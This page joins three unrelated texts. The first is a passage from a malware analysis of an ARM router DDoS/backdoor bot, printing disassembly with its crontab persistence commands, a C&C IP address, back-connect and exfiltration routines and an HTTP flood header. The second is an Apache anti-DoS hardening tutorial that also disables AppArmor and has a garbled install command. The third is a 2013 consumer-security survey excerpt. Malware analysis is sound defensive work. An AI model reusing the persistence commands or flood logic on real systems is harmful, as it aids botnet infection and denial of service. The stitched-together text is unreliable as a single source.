000000a0  d4 80 00 00 20 00 00 00  20 00 00 00 04 00 00 00  |........|
000000b0  04 00 00 00 07 00 00 00  dc c4 07 00 dc c4 08 00  |................|
000000c0  dc c4 08 00 14 00 00 00  30 00 00 00 04 00 00 00  |........0.......|
000000d0  04 00 00 00 04 00 00 00  10 00 00 00 01 00 00 00  |................|
000000e0  47 4e 55 00 00 00 00 00  02 00 00 00 06 00 00 00  |GNU.............|

Yeah, the “GNU” ascii appears now. And, see more details below:

1
2
3
4
5
6
7
8
9
10
Entry point address: "0x8110"
Start of program headers:  "52" (bytes into file)
Start of section headers:  "548,856" (bytes into file)
Flags:   "0x4000002", has entry point, "Version4 EABI"
Size of this header: "52" (bytes)
Size of program headers:   "32" (bytes)
Number of program headers:   "5"
Size of section headers:   "40" (bytes)
Number of section headers:   "28"
Section header string table index: "27"

Good! the true EP is shown now. And we have the new program headers too:

1
2
3
4
5
6
Type     Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
EXIDX    "0x07bb5c 0x00083b5c 0x00083b5c 0x00900 0x00900" R   0x4
LOAD     "0x000000 0x00008000 0x00008000 0x7c4dc 0x7c4dc" R E 0x8000
LOAD     "0x07c4dc 0x0008c4dc 0x0008c4dc 0x00a4c 0x44748" RW  0x8000
NOTE     "0x0000d4 0x000080d4 0x000080d4 0x00020 0x00020" R   0x4
TLS      "0x07c4dc 0x0008c4dc 0x0008c4dc 0x00014 0x00030" R   0x4

A quick calculation of the size above shows that at least we have accuracy to more than 80% to the actual size now, good enough. It showed we have unprotected/unpacked data and so I can expect good material to disassembly it, but firstly, let’s dump the sections to be sure that we have no more encryption/protection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
.note.ABI-tag
.init
.fini
.init_array
.fini_array
__libc_freeres_fn
__libc_thread_freeres_fn
__libc_freeres_ptrs
__libc_subfreeres
__libc_atexit
__libc_thread_subfreeres
.text
.rodata
.ARM.extab
.ARM.exidx
.ARM.attributes
.eh_frame
.jcr
.data.rel.ro
.got
.data
.bss
.note.ABI-tag
.tdata
.tbss

all are there!)) So after small additional confirmation, these are the section I picked to start analysis:

1
2
3
4
5
Name               Addr     Off    Size
-------------------------------------------
.text              0x08110 0x00110 0x6605c
.rodata            0x6f008 0x67008 0x149a0
__libc_freeres_fn  0x6e16c 0x6616c 0x00df4

To verdict its malicious process by reverse engineering

I will go to the reversing highlights, meanings..the most important process only. I don’t write the sub functions, i.e. how it grabs the ethernet data, or how this malware use socket to connect an IP, for example, since the code is too long. But to be noted, since ARM architecture has different structure than Intel, and ARM is designed for the embedded systems, you will see many different method for the detail operation that is involving with the system calls.
OK, here are the highlights that I would like to cover;

1. Installation:

Malware changes attribute & chmod the crontab, this is a bit specific setup that rarely found in the previous Elknot type, suggesting a new built, previously most of them are aiming autostart at the xinetd for autostart installation.

1
2
3
4
5
6
7
8
9
10
11
.text:0x0A760  STMFD   SP!, {R4-R8,LR}
.text:0x0A764  SUB  SP, SP, #0x208
.text:0x0A768  ADD  R7, SP, #0x108
.text:0x0A76C  MOV  R4, R0
.text:0x0A770  MOV  R8, R1
.text:0x0A774  MOV  R0, R7
.text:0x0A778  MOV  R1, #0x100
.text:0x0A77C  BL   sub_0x026FB0
.text:0x0A780  LDR  R0,  <-- "chattr -i /etc/crontab"
.text:0x0A784  BL   sub_0x0E3E0
.text:0x0A788  LDR  R0, <-- "chmod +w /etc/crontab"

Adding the autostart entry in it:

1
2
3
4
5
6
7
8
9
10
.text:0x0A7DC ; xref: sub_0x0A760
.text:0x0A7DC  LDR  R1, <-- "sed -i '/%s/d' /etc/crontab"
.text:0x0A7E0  MOV  R2, R5
.text:0x0A7E4  MOV  R0, R6
   :
.text:0x0A800  LDR  R1, <-- "echo '*/1 * * * * root %s/%s %s' >> /etc/crontab"
.text:0x0A804  STR  R8, [SP,#0x108+var_108]
.text:0x0A808  BL   sub_0x0182DC
.text:0x0A80C  MOV  R0, R6
.text:0x0A810  BL   sub_0x0E3E0

Create the file: “/etc/.mysys”, which later on found as the self copy attempt.

1
2
3
4
5
6
7
8
.text:0x0A83C  STR  LR, [SP,#var_4]!
.text:0x0A840  MOV  R1, #0x42
.text:0x0A844  SUB  SP, SP, #4
.text:0x0A848  LDR  R0, <-- "/etc/.mysys"
.text:0x0A84C  BL   sub_0x0E350
.text:0x0A850  CMP  R0, #0
.text:0x0A854  MOV  R1, #6
.text:0x0A858  BGT  loc_0x0A86C

2. Initiation of the service… which lead to CNC information 🙂

We’ll see 3 thread will be spawned, which using “/dev/null” as value, this is typical MO for most types of Linux/Elknot.I saw.

1
2
3
4
5
6
7
8
.text:0x082E0  LDR  R0, <-- "/dev/null"
.text:0x082E4  BL   sub_0x0E350 ;
.text:0x082E8  MOV  R1, #2
.text:0x082EC  LDR  R0, <-- "/dev/null"
.text:0x082F0  BL   sub_0x0E350
.text:0x082F4  MOV  R1, #2
.text:0x082F8  LDR  R0, <-- "/dev/null"
.text:0x082FC  BL   sub_0x0E350

..following with “effortS” to start the service:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
.text:0x0831C  LDR  R0, [R5]
.text:0x08320  LDR  R1, <-- "mt"
.text:0x08324  BL   sub_0x0A760
.text:0x08328  MOV  R0, #1
.text:0x0832C  MOV  R1, R0
.text:0x08330  BL   sub_0x01614C
.text:0x08334  LDR  R0, <-- reg RO = "Int Server..."
.text:0x08338  BL   sub_0x018F2C
.text:0x0833C  MOV  R1, R4
.text:0x08340  MOV  R3, R4
.text:0x08344  LDR  R2, =sub_0x08A60
.text:0x08348  LDR  R0, =unk_0x0D0990
.text:0x0834C  BL   sub_0x0B33C
.text:0x08350  MOV  R1, R4
.text:0x08354  MOV  R3, R4
.text:0x08358  LDR  R2, =sub_0x088D8
.text:0x0835C  LDR  R0, =unk_0x0D0988
.text:0x08360  BL   sub_0x0B33C
.text:0x08364  MOV  R1, R4
.text:0x08368  MOV  R3, R4
.text:0x0836C  LDR  R2, =sub_0x08598
.text:0x08370  LDR  R0, =unk_0x09097C
.text:0x08374  BL   sub_0x0B33C
.text:0x08378  MOV  R1, R4
.text:0x0837C  MOV  R3, R4

To connect to “something”. I trailed it to get all variables needed:

1
2
3
4
5
6
7
8
9
.text:0x08394  LDR  R0, <-- RO contains "connect to server..."
.text:0x08398  BL   sub_0x018F2C
.text:0x0839C  MOV  R1, #0
.text:0x083A0  MOV  R3, R1
.text:0x083A4  LDR  R2, =sub_0x0A038 <--"jump here"
       [...]
.text:0x0A038  STMFD   SP!, {R4-R10,LR}
.text:0x0A03C  SUB     SP, SP, #0x9C0
.text:0x0A040  BL      sub_0x09E68 <--"jump again here"

And the destination 0x09E68 there is the IP address of this connection.

1
2
.text:0x09E68 LDR  R0, =unk_0x08C5C4  <-- address to get the CNC IP Address
.text:0x09E68 <-- go down to hard-copied data:0x08C5C8 it's the IP "182.254.180.241"

Now we know the CNC is in 182.254.180.241 which is in:

1
2
3
4
ASN: 45090 / CNNIC-TENCENT-NET
PREFIX: 182.254.180.0/23
ISP: COMSENZ TECHNOLOGY LTD
COUNTRY: CHINA

..well, I am not surprised.

3. An effort to fake Windows Help (WinHelp.exe) service 🙂

Continuing the data flow started above, I end-up facing an interesting data:

1
2
3
4
   :
.text:0x09E68 LDR  R0, =unk_0x08C5C4
.text:0x09E6C STMFD   SP!, {R4-R8,R10,LR}
.text:0x09E70 LDR  R2, [R0,#(dword_0x08C62C - 0x08C5C4)]

The data after dword in .data:0x08C62C is the .data:0x08C630 (DCB) which is “WinHelp32.exe”, see it here if you don’t believe me:

This is just unbelievable, seeking further to figure what is this, I found the complete set of data for this “fake process” which is a self explanatory:

I don’t know what to say about this..

4. PoC of backdoor and sending sensitive data to remote host:

It’s self explanatory in the codes below, the BackConnect part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
.text:0x08420 ; .text:off_0x08408
.text:0x08420  STMFD   SP!, {R4,LR}
.text:0x08424  LDR  R4, =dword_0x0D0984
.text:0x08428
.text:0x08428 ; xref: sub_0x08420
.text:0x08428  LDR  R0, <---- "Back connect to server..."
.text:0x0842C  BL   sub_0x018F2C
.text:0x08430  MOV  R1, #0
.text:0x08434  MOV  R3, R1
.text:0x08438  LDR  R2, =sub_0x099E0
.text:0x0843C  LDR  R0, =dword_0x0D0984
.text:0x08440  BL   sub_0x0B33C
.text:0x08444  MOV  R1, #0
.text:0x08448  LDR  R0, [R4]
.text:0x0844C  BL   sub_0x0C4FC
.text:0x08450  LDR  R0, [R4]
.text:0x08454  BL   sub_0x0E070
.text:0x08458  LDR  R0, =0x4C4B40
.text:0x0845C  BL   sub_0x0272F0
.text:0x08460  B    loc_0x08428

And the trace of information to be sent to remote:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
.text:0x08500  STMFD   SP!, {R4,R5,LR}
.text:0x08504  LDR  R1, =dword_0x090980
.text:0x08508  SUB  SP, SP, #0x400
.text:0x0850C  SUB  SP, SP, #0xC
.text:0x08510  LDR  R2, =dword_0x090978
.text:0x08514  LDR  R12, [R1]
.text:0x08518  ADD  R4, SP, #0x418+var_410
.text:0x0851C  LDR  R3, [R2]
.text:0x08520  MOV  R1, #0x400
.text:0x08524  LDR  R2  <--- "INFO:%d|%d"
.text:0x08528  MOV  R0, R4
.text:0x0852C  STR  R12, [SP,#0x418+var_418]
.text:0x08530  BL   sub_0x0182B0
.text:0x08534  LDR  R3, =dword_0x08CF44
.text:0x08538  MOV  R0, R4
.text:0x0853C  LDR  R5, [R3]
.text:0x08540  BL   sub_0x024540
.text:0x08544  MOV  R1, R4
.text:0x08548  ADD  R2, R0, #1
.text:0x0854C  MOV  R0, R5
.text:0x08550  BL   sub_0x0DF10
.text:0x08554  LDR  R3, =dword_0x08CF48
.text:0x08558  MOV  R0, R4
.text:0x0855C  LDR  R5, [R3]
.text:0x08560  BL   sub_0x024540
.text:0x08564  MOV  R1, R4
.text:0x08568  ADD  R2, R0, #1
.text:0x0856C  MOV  R0, R5
.text:0x08570  BL   sub_0x0DF10
.text:0x08574  ADD  SP, SP, #0xC
.text:0x08578  ADD  SP, SP, #0x400
.text:0x0857C  LDMFD   SP!, {R4,R5,LR}
.text:0x08580  BX   LR

5. The HTTP header used for DoS activity:

This is the function to be called when performing DoS by HTTP, I pasted it here as PoC of DDoS’er, please bear the length:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
.text:0x0A548  LDR  R1 <--- " HTTP/1.1\r\n"
.text:0x0A54C  MOV  R2, #0xB
.text:0x0A550  ADD  R0, R8, R5
.text:0x0A554  BL   sub_0x0252B8
.text:0x0A558  ADD  R0, R5, #0xB
.text:0x0A55C  LDR  R1 <--- "Accept: text/html, application/xhtml+xml, */*\r\n"
.text:0x0A560  MOV  R2, #0x2F
.text:0x0A564  ADD  R0, R8, R0
.text:0x0A568  BL   sub_0x0252B8
.text:0x0A56C  ADD  R0, R5, #0x3A
.text:0x0A570  LDR  R1 <--- "Accept-Language: zh-CN\r\n"
                      "↑please noted this CHINESE character encoding↑"
.text:0x0A574  MOV  R2, #0x18
.text:0x0A578  ADD  R0, R8, R0
.text:0x0A57C  BL   sub_0x0252B8
.text:0x0A580  ADD  R0, R5, #0x52
.text:0x0A584  LDR  R1 <--- "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
.text:0x0A588  MOV  R2, #0x55
.text:0x0A58C  ADD  R0, R8, R0
.text:0x0A590  BL   sub_0x0252B8
.text:0x0A594  ADD  R0, R5, #0xA7
.text:0x0A598  LDR  R1 <--- "Accept-Encoding: gzip, deflate\r\n"
.text:0x0A59C  MOV  R2, #0x20
.text:0x0A5A0  ADD  R0, R8, R0
.text:0x0A5A4  BL   sub_0x0252B8
.text:0x0A5A8  ADD  R0, R5, #0xC7
.text:0x0A5AC  LDR  R1 <--- "Host: "
.text:0x0A5B0  MOV  R2, #6
.text:0x0A5B4  ADD  R0, R8, R0
.text:0x0A5B8  BL   sub_0x0252B8
.text:0x0A5BC  MOV  R0, R9
.text:0x0A5C0  BL   sub_0x024540
.text:0x0A5C4  ADD  R5, R5, #0xCD
.text:0x0A5C8  ADD  R4, R8, R5
.text:0x0A5CC  MOV  R2, R0
.text:0x0A5D0  MOV  R1, R9
.text:0x0A5D4  MOV  R0, R4
.text:0x0A5D8  BL   sub_0x0252B8
.text:0x0A5DC  MOV  R0, R9
.text:0x0A5E0  BL   sub_0x024540
.text:0x0A5E4  ADD  R5, R5, R0
.text:0x0A5E8  LDR  R1 <--- "\r\nConnection: Keep-Alive\r\n"
.text:0x0A5EC  MOV  R2, #0x1A
.text:0x0A5F0  ADD  R0, R8, R5
.text:0x0A5F4  BL   sub_0x0252B8
.text:0x0A5F8  ADD  R0, R5, #0x1A
.text:0x0A5FC  MOV  R2, #0x14
.text:0x0A600  LDR  R1 <--- "Pragma: no-cache\r\n\r\n"
.text:0x0A604  ADD  R0, R8, R0
.text:0x0A608  BL   sub_0x0252B8
.text:0x0A60C  MOV  R1, #1
.text:0x0A610  MOV  R0, #0xD
.text:0x0A614  BL   sub_0x01614C
.text:0x0A618  MOV  R0, R10
.text:0x0A61C  MOV  R1, R8
.text:0x0A620  ADD  R2, R5, #0x2E
.text:0x0A624  MOV  R3, #0
.text:0x0A628  BL   sub_0x0E1D0
   :    ;
.text:0x0A674  LDR  R1 <-- "GET "
.text:0x0A678  MOV  R2, #4
.text:0x0A67C  MOV  R0, R8
.text:0x0A680  BL   sub_0x0252B8

Detection ratio & sample

The detection ratio is very low, like..ZERO. Here’s the evidence, please click to enlarge the image:

The VirusTotal’s link is here–>[LINK]

This post is a proof of concept that routers is aimed by the malware actors for many reasons, and one of the main reason is because they are widely used all over the internet with having the global IP address. For the crooks who are behind this post, owning many routers means having power of an “army of DoS bots” than can be powerful tool for an attack. We saw not only ARM architecture, but MIPS, MIPSEL, SuperH binaries are also spotted in the wild.

I am adding these project’s sample in kernel mode, Will add the link shortly in here, please stay tune, I must clean up all of the garbage I made first. This is the link–>[HERE]

Conclusion & additional notes

It is up to you to defend your own router. As you can see no AV can detect these malware, it’s over a week being there now. Please check your router user interface, make sure you are using the latest updates/firmware and make sure that your setting is correct and unchanged. Being skeptical during checking your router/gateway layer is very recommendable, and if you find anything unusual/suspicious please analyze it WHY and try not to let it go until you find a satisfactory answer for it. If you find it work and having no problem, backup the setting and save it right away.

The Intel x32 edition of this variant just was just spotted, analysis is here–>[LINK] <<– you can see more details on source, compatibility, compilation etc.

The router version of ELF DDoS + backdoor malware is also spotted in the MIPS architercture, analysis is here–>[HERE] and in here–>[HERE]. The older version of the ARM ELF DDoS’er malware spotted is also available here–>[HERE].
The below tweet is the PoC that even PPC architecture is also aimed by DDoS’er malware too now (different actor & using “Tsunami” malware)

This is a warning of the true fact & evidence that the recent ELF malware coders are not only aiming x32 or x64 servers anymore, but routers too.

Why SOHO routers are aimed for malware infection?

The excellent research conducted by ISE (independent security firm in Baltimore, Maryland) explained in their publishment here–[LINK], that:
“..discovered critical security vulnerabilities in numerous small office/home office (SOHO) routers and wireless access points. These vulnerabilities allow a remote attacker to take full control of the router’s configuration settings; some allow a local attacker to bypass authentication directly and take control. “

As an illustration, ISE shows a matrix of vulnerability vectors for the evaluated known routers:

This shows us there is a weak security vector is aimed in SOHO router layer, and most of the houses & SOHO business are connected in the internet through these xDSL routers. We can not under-estimated the current volume of these routers, being up and alive in internet now. Maybe there’s only a low percentage of alive routers are having the vulnerabilities mentioned, but please imagine how powerful a DDoS attack will be if a bad actor is successfully gaining access to control, say, 1% of overall alive xDSL SOHO routers. And please think what if your house or office routers are unknowingly participated into a DDoS or other attacks against a certain banks or a specific country in the world?

China ELF CNC & Web Panels Takedown

Among of the attackers we detected so far, China’s bad actors are the most aggressive one. If the bad actors in China think that MMD won’t do anything about their evil action, they can start to cry now, we tango’ed 25 29 ELF malware download panels panels (the counting is still rolling) as per announced below:

 

 

 

CREDIT:  #MalwareMustDie

Protect Apache web-server from application DoS attacks (Ubuntu)

This tutorial assumes that you have a running Ubuntu Server, that networking has been set up, and that you have ssh access.

Apache2 is the default web-server used by many Linux installations. It is not the only one available, or the best for all circumstances, but it covers many usage scenarios. During the installation, you may be asked which web-server to reconfigure automatically. Answer ‘apache2’.

Install Apache2

Use the following command to install Apache2 and other libraries.

$ sudo apt-get -y install apt-get install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert libapache2-mod-php5 php5 php5-common php5-gd php5-cli php5-cgi libapache2-mod-fcgid apache2-suexec php-pear php-auth php5-mcrypt mcrypt libapache2-mod-suphp libopenssl-ruby libapache2-mod-ruby

Update Timezone and Check Correct Time

To reduce confusion with shared or mirrored data, all servers ought to run as close to as in-sync as possible. Some cryptographic key management systems require accurate time. Lastly, for corporate servers, Sarbanes-Oxley and HIPAA Security Rules require accurate timestamping.

$ sudo apt-get -y install openntpd tzdata
$ sudo dpkg-reconfigure tzdata
$ sudo service openntpd restart

Disable AppArmor Conflicts

While AppArmor is a suite that does provide an additional layer of security, it is my opinion that custom profiles will need to be created for each system. That is something not covered in this tutorial. So for now, we are going to disable it to prevent conflicts with any default configurations.

$ sudo /etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor apparmor-utils

Note: disabling AppArmor is not recommended for a production web server. For those wanting to create a custom AppArmor profile, refer to the official documentation.

Stop DDoS Attacks

A DDoS attack is a distributed denial-of-service attack. An Apache module exists to stop such attacks.

$ sudo apt-get -y install libapache2-mod-evasive
$ sudo mkdir -p /var/log/apache2/evasive
$ sudo chown -R www-data:root /var/log/apache2/evasive

Append the following to the bottom of mod-evasive.load:

$ sudo nano /etc/apache2/mods-available/mod-evasive.load

DOSHashTableSize 2048
DOSPageCount 20            # maximum number of requests for the same page
DOSSiteCount 300           # total number of requests for any object by the same client IP on the same listener
DOSPageInterval 1.0        # interval for the page count threshold
DOSSiteInterval 1.0        # interval for the site count threshold
DOSBlockingPeriod 10.0     # time that a client IP will be blocked for
DOSLogDir “/var/log/apache2/evasive”
DOSEmailNotify admin@domain.com

Stop Slowloris Attacks

An Apache modules also exist for Slowloris attacks, though the module name depends on which version of Ubuntu that you are using. For Ubuntu 12.10 or later:

$ sudo apt-get -y install libapache2-mod-qos

Then check configuration in qos.conf:

$ sudo nano /etc/apache2/mods-available/qos.conf
## QoS Settings
<IfModule mod_qos.c>
    # handles connections from up to 100000 different IPs
    QS_ClientEntries 100000
    # will allow only 50 connections per IP
    QS_SrvMaxConnPerIP 50
    # maximum number of active TCP connections is limited to 256
    MaxClients              256 
    # disables keep-alive when 70% of the TCP connections are occupied:
    QS_SrvMaxConnClose      180
    # minimum request/response speed (deny slow clients blocking the server,     
    # ie. slowloris keeping connections open without requesting anything):
    QS_SrvMinDataRate       150 1200
    # and limit request header and body (carefull, that limits uploads and 
    # post requests too):
    # LimitRequestFields      30
    # QS_LimitRequestBody     102400
</IfModule>

Note: If you are running a version of Ubuntu prior to 12.04, use the following instead.

$ sudo apt-get -y install libapache2-mod-antiloris

Check config in antiloris.conf.

$ sudo nano /etc/apache2/mods-available/antiloris.conf
<IfModule mod_antiloris.c>
	# Maximum simultaneous connections in READ state per IP address 
	IPReadLimit 5 
</IfModule>

Stop DNS Injection Attacks

Spamhaus is a module that uses DNSBL in order to block spam relay via web forms, preventing URL injection, block http DDoS attacks from bots and generally protecting the server from known bad IP addresses.

$ sudo apt-get -y install libapache2-mod-spamhaus
$ sudo touch /etc/spamhaus.wl

Append the config to apache2.conf

$ sudo nano /etc/apache2/apache2.conf
<IfModule mod_spamhaus.c>
  MS_METHODS POST,PUT,OPTIONS,CONNECT 
  MS_WhiteList /etc/spamhaus.wl 
  MS_CacheSize 256 
</IfModule>

Restart Apache to load new modules.

$ sudo service apache2 restart

Now the webserver has been installed and is up and running. Point your web browser at your domain for a default message that confirms you are working. As a final check, run the following to see if your server has any error message. If there are errors, you will want to Google them and address them now.

$ sudo tail -200 /var/log/syslog

CREDIT:

CYBER SECURITY AWARENESS: HOW ONLINE BEHAVIOR PUTS CONSUMERS AT RISK

CYBER SECURITY AWARENESS: HOW ONLINE BEHAVIOR PUTS CONSUMERS AT RISK

October 2013 – rsa-fraud-report-102013

October marks the launch of National Cyber Security Awareness Month in the United
States, a time for the public and private sectors to come together to promote online
awareness about how to stay safe online. Last year, RSA launched the Online Identity Risk
Calculator in conjunction with the National Cyber Security Alliance (NCSA) to provide an
interactive tool for consumers to see how the activities they perform online could put
them at risk for identity theft and other cyber threats.
In the last year, we have received over 14,500 responses from consumers in more than
170 countries. Following are some of the highlights:
–– 67% of consumers access their online banking account at least once a week
–– 83% of consumers make a purchase online once a month or more often
–– 95% of consumers access one email account on a regular basis
– 40% access three or more email accounts on a regular basis
–– 77% of consumers access social networking sites on a regular basis
–– 74% of consumers have downloaded apps to a mobile device within the last year
–– 37% of consumers visit online gaming sites once a month or more often
–– 35% of consumers have been infected with a Trojan in the last year
So why are these statistics so important? Well take for example that 3 out of every 10
phishing emails are targeted at social networking sites1. When you consider that more
than three out of every four consumers uses a social networking site on a regular basis,
it makes the net that phishers are able to cast much wider.

rsa-fraud-report-102013